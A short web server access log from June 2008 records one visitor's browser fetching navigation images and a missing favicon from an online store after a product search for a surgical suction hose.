76.102.59.203 - - [10/Jun/2008:00:58:55 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical sucction hose" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
76.102.59.203 - - [10/Jun/2008:00:58:55 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
76.102.59.203 - - [10/Jun/2008:00:58:55 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical sucction hose" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
76.102.59.203 - - [10/Jun/2008:00:58:55 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical sucction hose" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
76.102.59.203 - - [10/Jun/2008:00:58:56 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical sucction hose" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
76.102.59.203 - - [10/Jun/2008:00:58:56 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical sucction hose" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
76.102.59.203 - - [10/Jun/2008:00:58:56 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical sucction hose" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
76.102.59.203 - - [10/Jun/2008:00:58:57 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical sucction hose" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
76.102.59.203 - - [10/Jun/2008:00:58:57 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical sucction hose" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
76.102.59.203 - - [10/Jun/2008:00:58:57 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical sucction hose" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
